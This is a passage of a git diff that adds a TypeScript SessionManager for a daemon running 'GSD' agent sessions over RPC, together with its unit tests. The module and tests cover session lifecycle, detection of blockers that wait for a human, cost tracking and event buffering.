mkdtempSync, writeFileSync, mkdirSync, rmSync } from 'node:fs'; +import { tmpdir } from 'node:os'; +import { join } from 'node:path'; + +import { SessionManager } from './session-manager.js'; +import { MAX_EVENTS } from './types.js'; +import type { ManagedSession, PendingBlocker } from './types.js'; +import { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Mock RpcClient (duck-typed to match RpcClient interface) +// --------------------------------------------------------------------------- + +class MockRpcClient { + started = false; + stopped = false; + aborted = false; + prompted: string[] = []; + private eventListeners: Array<(event: Record) => void> = []; + uiResponses: Array<{ requestId: string; response: Record }> = []; + + /** Control — set to make start() reject */ + startError: Error | null = null; + /** Control — set to make init() reject */ + initError: Error | null = null; + /** Control — override sessionId from init */ + initSessionId = 'mock-session-001'; + + cwd: string; + args: string[]; + + constructor(options?: Record) { + this.cwd = (options?.cwd as string) ?? ''; + this.args = (options?.args as string[]) ?? []; + } + + async start(): Promise { + if (this.startError) throw this.startError; + this.started = true; + } + + async stop(): Promise { + this.stopped = true; + } + + async init(): Promise<{ sessionId: string; version: string }> { + if (this.initError) throw this.initError; + return { sessionId: this.initSessionId, version: '2.51.0' }; + } + + onEvent(listener: (event: Record) => void): () => void { + this.eventListeners.push(listener); + return () => { + const idx = this.eventListeners.indexOf(listener); + if (idx >= 0) this.eventListeners.splice(idx, 1); + }; + } + + async prompt(message: string): Promise { + this.prompted.push(message); + } + + async abort(): Promise { + this.aborted = true; + } + + sendUIResponse(requestId: string, response: Record): void { + this.uiResponses.push({ requestId, response }); + } + + /** Test helper — emit an event to all listeners */ + emitEvent(event: Record): void { + for (const listener of this.eventListeners) { + listener(event); + } + } +} + +// --------------------------------------------------------------------------- +// TestableSessionManager — injects mock clients without module mocking (K008) +// --------------------------------------------------------------------------- + +class TestableSessionManager extends SessionManager { + lastClient: MockRpcClient | null = null; + allClients: MockRpcClient[] = []; + private sessionCounter = 0; + nextInitError: Error | null = null; + nextStartError: Error | null = null; + + override async startSession(options: { projectDir: string; command?: string; model?: string; bare?: boolean; cliPath?: string }): Promise { + const { projectDir } = options; + + if (!projectDir || projectDir.trim() === '') { + throw new Error('projectDir is required and cannot be empty'); + } + + const resolvedDir = resolve(projectDir); + const projectName = basename(resolvedDir); + + // Check duplicate via getSessionByDir + const existing = this.getSessionByDir(resolvedDir); + if (existing) { + throw new Error( + `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})` + ); + } + + const client = new MockRpcClient({ cwd: resolvedDir, args: [] }); + if (this.nextStartError) { + client.startError = this.nextStartError; + this.nextStartError = null; + } + if (this.nextInitError) { + client.initError = this.nextInitError; + this.nextInitError = null; + } + + this.sessionCounter++; + client.initSessionId = `mock-session-${String(this.sessionCounter).padStart(3, '0')}`; + this.lastClient = client; + this.allClients.push(client); + + // Build session shell + const session: ManagedSession = { + sessionId: '', + projectDir: resolvedDir, + projectName, + status: 'starting', + client: client as any, // duck-typed mock + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + }; + + // Insert into internal sessions map + (this as any).sessions.set(resolvedDir, session); + + try { + await client.start(); + + const initResult = await client.init(); + session.sessionId = initResult.sessionId; + session.status = 'running'; + + // Wire event tracking using parent's handleEvent + session.unsubscribe = client.onEvent((event: Record) => { + (this as any).handleEvent(session, event); + }); + + // Kick off auto-mode + const command = options.command ?? '/gsd auto'; + await client.prompt(command); + + // Emit lifecycle events (matching parent behavior) + (this as any).logger.info('session started', { sessionId: session.sessionId, projectDir: resolvedDir }); + this.emit('session:started', { sessionId: session.sessionId, projectDir: resolvedDir, projectName }); + + return session.sessionId; + } catch (err) { + session.status = 'error'; + session.error = err instanceof Error ? err.message : String(err); + try { await client.stop(); } catch { /* swallow */ } + + (this as any).logger.error('session error', { sessionId: session.sessionId, projectDir: resolvedDir, error: session.error }); + this.emit('session:error', { sessionId: session.sessionId, projectDir: resolvedDir, projectName, error: session.error }); + + throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`); + } + } +} + +// --------------------------------------------------------------------------- +// Logger spy helper +// --------------------------------------------------------------------------- + +interface LogCall { + level: string; + msg: string; + data?: Record; +} + +class SpyLogger { + calls: LogCall[] = []; + private tmpDir: string; + logger: Logger; + + constructor() { + this.tmpDir = mkdtempSync(join(tmpdir(), 'sm-test-')); + this.logger = new Logger({ + filePath: join(this.tmpDir, 'test.log'), + level: 'debug', + }); + + // Intercept write calls by wrapping the logger methods + const original = { + debug: this.logger.debug.bind(this.logger), + info: this.logger.info.bind(this.logger), + warn: this.logger.warn.bind(this.logger), + error: this.logger.error.bind(this.logger), + }; + + this.logger.debug = (msg: string, data?: Record) => { + this.calls.push({ level: 'debug', msg, data }); + original.debug(msg, data); + }; + this.logger.info = (msg: string, data?: Record) => { + this.calls.push({ level: 'info', msg, data }); + original.info(msg, data); + }; + this.logger.warn = (msg: string, data?: Record) => { + this.calls.push({ level: 'warn', msg, data }); + original.warn(msg, data); + }; + this.logger.error = (msg: string, data?: Record) => { + this.calls.push({ level: 'error', msg, data }); + original.error(msg, data); + }; + } + + async cleanup(): Promise { + await this.logger.close(); + try { rmSync(this.tmpDir, { recursive: true, force: true }); } catch { /* ignore */ } + } + + findCalls(level: string, msgSubstring: string): LogCall[] { + return this.calls.filter(c => c.level === level && c.msg.includes(msgSubstring)); + } +} + +// --------------------------------------------------------------------------- +// Test Helpers +// --------------------------------------------------------------------------- + +let allManagers: TestableSessionManager[] = []; +let allSpyLoggers: SpyLogger[] = []; + +function createManager(): { manager: TestableSessionManager; spy: SpyLogger } { + const spy = new SpyLogger(); + const manager = new TestableSessionManager(spy.logger); + allManagers.push(manager); + allSpyLoggers.push(spy); + return { manager, spy }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('SessionManager', () => { + afterEach(async () => { + for (const m of allManagers) { + try { await m.cleanup(); } catch { /* swallow */ } + } + allManagers = []; + for (const s of allSpyLoggers) { + await s.cleanup(); + } + allSpyLoggers = []; + }); + + // ---- Lifecycle: start → running → completed ---- + + it('start → running → completed lifecycle', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/test-project' }); + assert.ok(sessionId); + + const session = manager.getSession(sessionId); + assert.ok(session); + assert.equal(session.status, 'running'); + assert.equal(session.projectName, 'test-project'); + + // Simulate terminal notification + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n1', + method: 'notify', + message: 'Auto-mode stopped: completed all tasks', + }); + + assert.equal(session.status, 'completed'); + + // Verify logger calls + const startedLogs = spy.findCalls('info', 'session started'); + assert.equal(startedLogs.length, 1); + const completedLogs = spy.findCalls('info', 'session completed'); + assert.equal(completedLogs.length, 1); + }); + + // ---- Lifecycle: start → running → blocked → resolve → running → completed ---- + + it('start → blocked → resolve → running → completed lifecycle', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/test-project-2' }); + const session = manager.getSession(sessionId)!; + + // Simulate blocking UI request (non-fire-and-forget method) + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'blocker-1', + method: 'confirm', + title: 'Merge PR?', + message: 'Should I merge this PR?', + }); + + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + assert.equal(session.pendingBlocker!.id, 'blocker-1'); + assert.equal(session.pendingBlocker!.method, 'confirm'); + + // Resolve the blocker + await manager.resolveBlocker(sessionId, 'yes'); + + assert.equal(session.status, 'running'); + assert.equal(session.pendingBlocker, null); + + // Verify UI response was sent + const client = manager.lastClient!; + assert.equal(client.uiResponses.length, 1); + assert.equal(client.uiResponses[0].requestId, 'blocker-1'); + + // Complete the session + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n2', + method: 'notify', + message: 'Auto-mode stopped: all done', + }); + + assert.equal(session.status, 'completed'); + }); + + // ---- Lifecycle: start → error (init failure) ---- + + it('start → error when init fails', async () => { + const { manager, spy } = createManager(); + + manager.nextInitError = new Error('Connection refused'); + + await assert.rejects( + () => manager.startSession({ projectDir: '/tmp/test-error-project' }), + (err: Error) => { + assert.ok(err.message.includes('Connection refused')); + return true; + } + ); + + // Session should still exist in map with error status + const session = manager.getSessionByDir('/tmp/test-error-project'); + assert.ok(session); + assert.equal(session.status, 'error'); + assert.ok(session.error?.includes('Connection refused')); + + // Logger should have error call + const errorLogs = spy.findCalls('error', 'session error'); + assert.equal(errorLogs.length, 1); + }); + + // ---- Duplicate session prevention ---- + + it('rejects duplicate session for same projectDir', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/dup-test' }); + + await assert.rejects( + () => manager.startSession({ projectDir: '/tmp/dup-test' }), + (err: Error) => { + assert.ok(err.message.includes('Session already active')); + return true; + } + ); + }); + + // ---- Cancel session ---- + + it('cancels a running session', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/cancel-test' }); + const session = manager.getSession(sessionId)!; + const client = manager.lastClient!; + + await manager.cancelSession(sessionId); + + assert.equal(session.status, 'cancelled'); + assert.ok(client.aborted); + assert.ok(client.stopped); + + const cancelLogs = spy.findCalls('info', 'session cancelled'); + assert.equal(cancelLogs.length, 1); + }); + + // ---- Cost accumulation (K004 cumulative-max) ---- + + it('accumulates cost using cumulative-max pattern (K004)', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/cost-test' }); + const session = manager.getSession(sessionId)!; + const client = manager.lastClient!; + + // First cost update + client.emitEvent({ + type: 'cost_update', + runId: 'run-1', + turnCost: 0.01, + cumulativeCost: 0.01, + tokens: { input: 100, output: 50, cacheRead: 20, cacheWrite: 10 }, + }); + + assert.equal(session.cost.totalCost, 0.01); + assert.equal(session.cost.tokens.input, 100); + + // Second cost update — cumulative values should increase + client.emitEvent({ + type: 'cost_update', + runId: 'run-1', + turnCost: 0.02, + cumulativeCost: 0.03, + tokens: { input: 250, output: 120, cacheRead: 40, cacheWrite: 20 }, + }); + + assert.equal(session.cost.totalCost, 0.03); + assert.equal(session.cost.tokens.input, 250); + assert.equal(session.cost.tokens.output, 120); + + // Third update with lower values — max should hold + client.emitEvent({ + type: 'cost_update', + runId: 'run-2', + turnCost: 0.005, + cumulativeCost: 0.02, // lower than 0.03 — should NOT replace + tokens: { input: 50, output: 30, cacheRead: 5, cacheWrite: 2 }, + }); + + assert.equal(session.cost.totalCost, 0.03); // max held + assert.equal(session.cost.tokens.input, 250); // max held + }); + + // ---- Ring buffer event trimming ---- + + it('trims events when exceeding MAX_EVENTS', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/ringbuf-test' }); + const session = manager.getSession(sessionId)!; + const client = manager.lastClient!; + + // Push MAX_EVENTS + 20 events + for (let i = 0; i < MAX_EVENTS + 20; i++) { + client.emitEvent({ + type: 'assistant_message', + id: `msg-${i}`, + content: `Event ${i}`, + }); + } + + assert.equal(session.events.length, MAX_EVENTS); + // Oldest events should be trimmed — first event should be #20 + const firstEvent = session.events[0] as Record; + assert.equal(firstEvent.id, 'msg-20'); + }); + + // ---- Blocker detection (non-fire-and-forget extension_ui_request) ---- + + it('detects blocker from non-fire-and-forget extension_ui_request', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/blocker-test' }); + const session = manager.getSession(sessionId)!; + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'sel-1', + method: 'select', + title: 'Choose deployment target', + options: ['staging', 'production'], + }); + + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + assert.equal(session.pendingBlocker!.method, 'select'); + + const blockedLogs = spy.findCalls('info', 'session blocked'); + assert.equal(blockedLogs.length, 1); + }); + + // ---- Fire-and-forget methods do NOT block ---- + + it('fire-and-forget methods do not trigger blocker', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/faf-test' }); + const session = manager.getSession(sessionId)!; + + // setStatus is fire-and-forget + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'st-1', + method: 'setStatus', + statusKey: 'build', + statusText: 'Building...', + }); + + assert.equal(session.status, 'running'); + assert.equal(session.pendingBlocker, null); + }); + + // ---- Terminal detection (auto-mode stopped notification) ---- + + it('detects terminal from auto-mode stopped notification', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/terminal-test' }); + const session = manager.getSession(sessionId)!; + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n1', + method: 'notify', + message: 'Step-mode stopped: user requested', + }); + + assert.equal(session.status, 'completed'); + }); + + // ---- getAllSessions returns all tracked sessions ---- + + it('getAllSessions returns all tracked sessions', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/proj-a' }); + await manager.startSession({ projectDir: '/tmp/proj-b' }); + await manager.startSession({ projectDir: '/tmp/proj-c' }); + + const all = manager.getAllSessions(); + assert.equal(all.length, 3); + + const dirs = all.map(s => s.projectDir).sort(); + assert.ok(dirs[0].endsWith('proj-a')); + assert.ok(dirs[1].endsWith('proj-b')); + assert.ok(dirs[2].endsWith('proj-c')); + }); + + // ---- cleanup stops all active sessions ---- + + it('cleanup stops all active sessions', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/cleanup-a' }); + await manager.startSession({ projectDir: '/tmp/cleanup-b' }); + + const clients = [...manager.allClients]; + assert.equal(clients.length, 2); + + await manager.cleanup(); + + const all = manager.getAllSessions(); + for (const s of all) { + assert.equal(s.status, 'cancelled'); + } + // Both clients should have been stopped + for (const c of clients) { + assert.ok(c.stopped); + } + }); + + // ---- EventEmitter: session:started ---- + + it('emits session:started event', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:started', (data: Record) => { emittedData = data; }); + + const sessionId = await manager.startSession({ projectDir: '/tmp/emit-start' }); + + assert.ok(emittedData); + assert.equal(emittedData.sessionId, sessionId); + assert.equal(emittedData.projectName, 'emit-start'); + }); + + // ---- EventEmitter: session:blocked ---- + + it('emits session:blocked event', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:blocked', (data: Record) => { emittedData = data; }); + + await manager.startSession({ projectDir: '/tmp/emit-blocked' }); + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'b-1', + method: 'input', + title: 'Enter API key', + }); + + assert.ok(emittedData); + assert.equal((emittedData.blocker as PendingBlocker).id, 'b-1'); + }); + + // ---- EventEmitter: session:completed ---- + + it('emits session:completed event', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:completed', (data: Record) => { emittedData = data; }); + + await manager.startSession({ projectDir: '/tmp/emit-completed' }); + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n1', + method: 'notify', + message: 'Auto-mode stopped: success', + }); + + assert.ok(emittedData); + assert.equal(emittedData.projectName, 'emit-completed'); + }); + + // ---- EventEmitter: session:error ---- + + it('emits session:error event on init failure', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:error', (data: Record) => { emittedData = data; }); + + manager.nextInitError = new Error('Process crashed'); + + try { + await manager.startSession({ projectDir: '/tmp/emit-error' }); + } catch { /* expected */ } + + assert.ok(emittedData); + assert.ok((emittedData.error as string).includes('Process crashed')); + }); + + // ---- EventEmitter: session:event ---- + + it('emits session:event for every forwarded event', async () => { + const { manager } = createManager(); + + const events: Record[] = []; + manager.on('session:event', (data) => { events.push(data); }); + + await manager.startSession({ projectDir: '/tmp/emit-event' }); + + manager.lastClient!.emitEvent({ type: 'assistant_message', id: 'a1', content: 'Hello' }); + manager.lastClient!.emitEvent({ type: 'tool_use', id: 't1', name: 'read' }); + + assert.equal(events.length, 2); + }); + + // ---- Empty projectDir rejection ---- + + it('rejects empty projectDir', async () => { + const { manager } = createManager(); + + await assert.rejects( + () => manager.startSession({ projectDir: '' }), + (err: Error) => { + assert.ok(err.message.includes('projectDir is required')); + return true; + } + ); + + await assert.rejects( + () => manager.startSession({ projectDir: ' ' }), + (err: Error) => { + assert.ok(err.message.includes('projectDir is required')); + return true; + } + ); + }); + + // ---- Logger receives structured calls ---- + + it('logger receives structured calls during lifecycle', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/log-test' }); + + // Should have 'session started' info log + const started = spy.findCalls('info', 'session started'); + assert.equal(started.length, 1); + assert.ok(started[0].data?.sessionId); + assert.ok(started[0].data?.projectDir); + + // Emit an event — should produce debug log + manager.lastClient!.emitEvent({ type: 'assistant_message', id: 'a1', content: 'hi' }); + const debugLogs = spy.findCalls('debug', 'session event'); + assert.ok(debugLogs.length >= 1); + assert.ok(debugLogs[0].data?.type); + }); + + // ---- getResult returns structured status ---- + + it('getResult returns structured status', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/result-test' }); + const result = manager.getResult(sessionId); + + assert.equal(result.sessionId, sessionId); + assert.equal(result.status, 'running'); + assert.equal(result.projectName, 'result-test'); + assert.equal(result.error, null); + assert.equal(result.pendingBlocker, null); + assert.ok(typeof result.durationMs === 'number'); + assert.ok(result.cost); + assert.ok(Array.isArray(result.recentEvents)); + }); + + // ---- getResult throws for unknown session ---- + + it('getResult throws for unknown sessionId', () => { + const { manager } = createManager(); + + assert.throws( + () => manager.getResult('nonexistent'), + (err: Error) => err.message.includes('Session not found') + ); + }); + + // ---- resolveBlocker throws when no blocker pending ---- + + it('resolveBlocker throws when no blocker pending', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/no-blocker' }); + + await assert.rejects( + () => manager.resolveBlocker(sessionId, 'yes'), + (err: Error) => err.message.includes('No pending blocker') + ); + }); + + // ---- cancelSession throws for unknown session ---- + + it('cancelSession throws for unknown sessionId', async () => { + const { manager } = createManager(); + + await assert.rejects( + () => manager.cancelSession('nonexistent'), + (err: Error) => err.message.includes('Session not found') + ); + }); + + // ---- Blocked notification detected as blocker, not terminal ---- + + it('blocked notification sets status to blocked, not completed', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/blocked-notify' }); + const session = manager.getSession(sessionId)!; + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'bn-1', + method: 'notify', + message: 'Auto-mode stopped: Blocked: waiting for approval', + }); + + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + }); + + // ---- projectName is basename of resolved projectDir ---- + + it('projectName is basename of projectDir', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/home/user/projects/my-app' }); + const session = manager.getSession(sessionId)!; + + assert.equal(session.projectName, 'my-app'); + }); + + // ---- Custom command is sent instead of default ---- + + it('sends custom command when provided', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/custom-cmd', command: '/gsd quick fix-typo' }); + const client = manager.lastClient!; + + assert.ok(client.prompted.includes('/gsd quick fix-typo')); + assert.ok(!client.prompted.includes('/gsd auto')); + }); + + // ---- getSessionByDir returns session by directory lookup ---- + + it('getSessionByDir returns session by directory', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/dir-lookup' }); + const session = manager.getSessionByDir('/tmp/dir-lookup'); + + assert.ok(session); + assert.equal(session.projectName, 'dir-lookup'); + }); +}); diff --git a/packages/daemon/src/session-manager.ts b/packages/daemon/src/session-manager.ts new file mode 100644 index 000000000..d954e37db --- /dev/null +++ b/packages/daemon/src/session-manager.ts @@ -0,0 +1,394 @@ +/** + * SessionManager — manages RpcClient lifecycle for daemon-driven GSD execution. + * + * Extends EventEmitter to emit typed session lifecycle events. + * One active session per projectDir. Tracks events in a ring buffer, + * detects blockers, tracks terminal state, and accumulates cost using + * the cumulative-max pattern (K004). + * + * Adapted from packages/mcp-server/src/session-manager.ts with: + * - Logger integration for structured logging + * - EventEmitter for session lifecycle events + * - getAllSessions() for cross-project status (R035) + * - projectName field on ManagedSession + */ + +import { execSync } from 'node:child_process'; +import { basename, resolve } from 'node:path'; +import { EventEmitter } from 'node:events'; +import { RpcClient } from '@gsd-build/rpc-client'; +import type { SdkAgentEvent, RpcInitResult, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import type { + ManagedSession, + StartSessionOptions, + PendingBlocker, +} from './types.js'; +import { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Inlined detection logic (from headless-events.ts — no internal package imports) +// --------------------------------------------------------------------------- + +const FIRE_AND_FORGET_METHODS = new Set([ + 'notify', 'setStatus', 'setWidget', 'setTitle', 'set_editor_text', +]); + +const TERMINAL_PREFIXES = ['auto-mode stopped', 'step-mode stopped']; + +function isTerminalNotification(event: Record): boolean { + if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false; + const message = String(event.message ?? '').toLowerCase(); + return TERMINAL_PREFIXES.some((prefix) => message.startsWith(prefix)); +} + +function isBlockedNotification(event: Record): boolean { + if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false; + const message = String(event.message ?? '').toLowerCase(); + return message.includes('blocked:'); +} + +function isBlockingUIRequest(event: Record): boolean { + if (event.type !== 'extension_ui_request') return false; + const method = String(event.method ?? ''); + return !FIRE_AND_FORGET_METHODS.has(method); +} + +// --------------------------------------------------------------------------- +// SessionManager +// --------------------------------------------------------------------------- + +export class SessionManager extends EventEmitter { + /** Sessions keyed by resolved projectDir for duplicate-start prevention */ + private sessions = new Map(); + + constructor(private readonly logger: Logger) { + super(); + } + + /** + * Start a new GSD auto-mode session for the given project directory. + * + * Rejects if a session already exists for this projectDir. + * Creates an RpcClient, starts the process, performs the v2 init handshake, + * wires event tracking, and sends '/gsd auto' to begin execution. + */ + async startSession(options: StartSessionOptions): Promise { + const { projectDir } = options; + + if (!projectDir || projectDir.trim() === '') { + throw new Error('projectDir is required and cannot be empty'); + } + + const resolvedDir = resolve(projectDir); + const projectName = basename(resolvedDir); + + const existing = this.sessions.get(resolvedDir); + if (existing) { + throw new Error( + `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})` + ); + } + + const cliPath = options.cliPath ?? SessionManager.resolveCLIPath(); + + const args: string[] = ['--mode', 'rpc']; + if (options.model) args.push('--model', options.model); + if (options.bare) args.push('--bare'); + + const client = new RpcClient({ + cliPath, + cwd: resolvedDir, + args, + }); + + // Build the session shell before async operations so we can track state + const session: ManagedSession = { + sessionId: '', // filled after init + projectDir: resolvedDir, + projectName, + status: 'starting', + client, + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + }; + + // Insert into map early (keyed by dir) so concurrent starts are rejected + this.sessions.set(resolvedDir, session); + + try { + // Start the process with timeout + await Promise.race([ + client.start(), + timeout(INIT_TIMEOUT_MS, `RpcClient.start() timed out after ${INIT_TIMEOUT_MS}ms`), + ]); + + // Perform v2 init handshake + const initResult: RpcInitResult = await Promise.race([ + client.init(), + timeout(INIT_TIMEOUT_MS, `RpcClient.init() timed out after ${INIT_TIMEOUT_MS}ms`), + ]) as RpcInitResult; + + session.sessionId = initResult.sessionId; + session.status = 'running'; + + // Wire event tracking + session.unsubscribe = client.onEvent((event: SdkAgentEvent) => { + this.handleEvent(session, event); + }); + + // Kick off auto-mode + const command = options.command ?? '/gsd auto'; + await client.prompt(command); + + this.logger.info('session started', { sessionId: session.sessionId, projectDir: resolvedDir }); + this.emit('session:started', { sessionId: session.sessionId, projectDir: resolvedDir, projectName }); + + return session.sessionId; + } catch (err) { + session.status = 'error'; + session.error = err instanceof Error ? err.message : String(err); + + // Attempt cleanup + try { await client.stop(); } catch { /* swallow cleanup errors */ } + + this.logger.error('session error', { sessionId: session.sessionId, projectDir: resolvedDir, error: session.error }); + this.emit('session:error', { sessionId: session.sessionId, projectDir: resolvedDir, projectName, error: session.error }); + + // Keep session in map so callers can inspect the error + throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`); + } + } + + /** + * Look up a session by sessionId. + * Linear scan is fine — we expect <10 concurrent sessions. + */ + getSession(sessionId: string): ManagedSession | undefined { + for (const session of this.sessions.values()) { + if (session.sessionId === sessionId) return session; + } + return undefined; + } + + /** + * Look up a session by project directory (direct map lookup). + */ + getSessionByDir(projectDir: string): ManagedSession | undefined { + return this.sessions.get(resolve(projectDir)); + } + + /** + * Return all tracked sessions (R035 — cross-project status). + */ + getAllSessions(): ManagedSession[] { + return Array.from(this.sessions.values()); + } + + /** + * Resolve a pending blocker by sending a UI response. + */ + async resolveBlocker(sessionId: string, response: string): Promise { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + if (!session.pendingBlocker) throw new Error(`No pending blocker for session ${sessionId}`); + + const blocker = session.pendingBlocker; + session.client.sendUIResponse(blocker.id, { value: response }); + session.pendingBlocker = null; + if (session.status === 'blocked') { + session.status = 'running'; + } + + this.logger.info('blocker resolved', { + sessionId, + projectDir: session.projectDir, + blockerId: blocker.id, + blockerMethod: blocker.method, + }); + } + + /** + * Cancel a running session — abort current operation then stop the process. + */ + async cancelSession(sessionId: string): Promise { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + + try { + await session.client.abort(); + } catch { /* may already be stopped */ } + + try { + await session.client.stop(); + } catch { /* swallow */ } + + session.status = 'cancelled'; + session.unsubscribe?.(); + + this.logger.info('session cancelled', { sessionId, projectDir: session.projectDir }); + } + + /** + * Build a HeadlessJsonResult-shaped object from accumulated session state. + */ + getResult(sessionId: string): Record { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + + const durationMs = Date.now() - session.startTime; + + return { + sessionId: session.sessionId, + projectDir: session.projectDir, + projectName: session.projectName, + status: session.status, + durationMs, + cost: session.cost, + recentEvents: session.events.slice(-10), + pendingBlocker: session.pendingBlocker + ? { id: session.pendingBlocker.id, method: session.pendingBlocker.method, message: session.pendingBlocker.message } + : null, + error: session.error ?? null, + }; + } + + /** + * Stop all active sessions and clean up resources. + */ + async cleanup(): Promise { + const stopPromises: Promise[] = []; + + for (const session of this.sessions.values()) { + session.unsubscribe?.(); + if (session.status === 'running' || session.status === 'starting' || session.status === 'blocked') { + stopPromises.push( + session.client.stop().catch(() => { /* swallow */ }) + ); + session.status = 'cancelled'; + } + } + + await Promise.allSettled(stopPromises); + } + + /** + * Resolve the GSD CLI path. + * + * 1. GSD_CLI_PATH env var (highest priority) + * 2. `which gsd` → resolve to the actual dist/cli.js + */ + static resolveCLIPath(): string { + const envPath = process.env['GSD_CLI_PATH']; + if (envPath) return resolve(envPath); + + try { + const gsdBin = execSync('which gsd', { encoding: 'utf-8' }).trim(); + if (gsdBin) return resolve(gsdBin); + } catch { + // which failed + } + + throw new Error( + 'Cannot find GSD CLI. Set GSD_CLI_PATH environment variable or ensure `gsd` is in PATH.' + ); + } + + // --------------------------------------------------------------------------- + // Private: Event Handling + // --------------------------------------------------------------------------- + + private handleEvent(session: ManagedSession, event: SdkAgentEvent): void { + // Ring buffer: push and trim + session.events.push(event); + if (session.events.length > MAX_EVENTS) { + session.events.splice(0, session.events.length - MAX_EVENTS); + } + + // Forward event to listeners + this.logger.debug('session event', { sessionId: session.sessionId, type: (event as Record).type as string }); + this.emit('session:event', { sessionId: session.sessionId, projectDir: session.projectDir, event }); + + // Cost tracking (K004 — cumulative-max) + if ((event as Record).type === 'cost_update') { + const costEvent = event as unknown as RpcCostUpdateEvent; + session.cost.totalCost = Math.max(session.cost.totalCost, costEvent.cumulativeCost ?? 0); + if (costEvent.tokens) { + session.cost.tokens.input = Math.max(session.cost.tokens.input, costEvent.tokens.input ?? 0); + session.cost.tokens.output = Math.max(session.cost.tokens.output, costEvent.tokens.output ?? 0); + session.cost.tokens.cacheRead = Math.max(session.cost.tokens.cacheRead, costEvent.tokens.cacheRead ?? 0); + session.cost.tokens.cacheWrite = Math.max(session.cost.tokens.cacheWrite, costEvent.tokens.cacheWrite ?? 0); + } + } + + // Terminal detection — auto-mode/step-mode stopped + if (isTerminalNotification(event as Record)) { + if (isBlockedNotification(event as Record)) { + session.status = 'blocked'; + session.pendingBlocker = extractBlocker(event); + this.logger.info('session blocked', { + sessionId: session.sessionId, + projectDir: session.projectDir, + blockerId: session.pendingBlocker.id, + blockerMethod: session.pendingBlocker.method, + }); + this.emit('session:blocked', { + sessionId: session.sessionId, + projectDir: session.projectDir, + projectName: session.projectName, + blocker: session.pendingBlocker, + }); + } else { + session.status = 'completed'; + session.unsubscribe?.(); + this.logger.info('session completed', { sessionId: session.sessionId, projectDir: session.projectDir }); + this.emit('session:completed', { + sessionId: session.sessionId, + projectDir: session.projectDir, + projectName: session.projectName, + }); + } + return; + } + + // Blocker detection — non-fire-and-forget extension_ui_request + if (isBlockingUIRequest(event as Record)) { + session.status = 'blocked'; + session.pendingBlocker = extractBlocker(event); + this.logger.info('session blocked', { + sessionId: session.sessionId, + projectDir: session.projectDir, + blockerId: session.pendingBlocker.id, + blockerMethod: session.pendingBlocker.method, + }); + this.emit('session:blocked', { + sessionId: session.sessionId, + projectDir: session.projectDir, + projectName: session.projectName, + blocker: session.pendingBlocker, + }); + } + } +} + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +function timeout(ms: number, message: string): Promise { + return new Promise((_, reject) => { + setTimeout(() => reject(new Error(message)), ms); + }); +} + +function extractBlocker(event: SdkAgentEvent): PendingBlocker { + const uiEvent = event as unknown as RpcExtensionUIRequest; + return { + id: String(uiEvent.id ?? ''), + method: String(uiEvent.method ?? ''), + message: 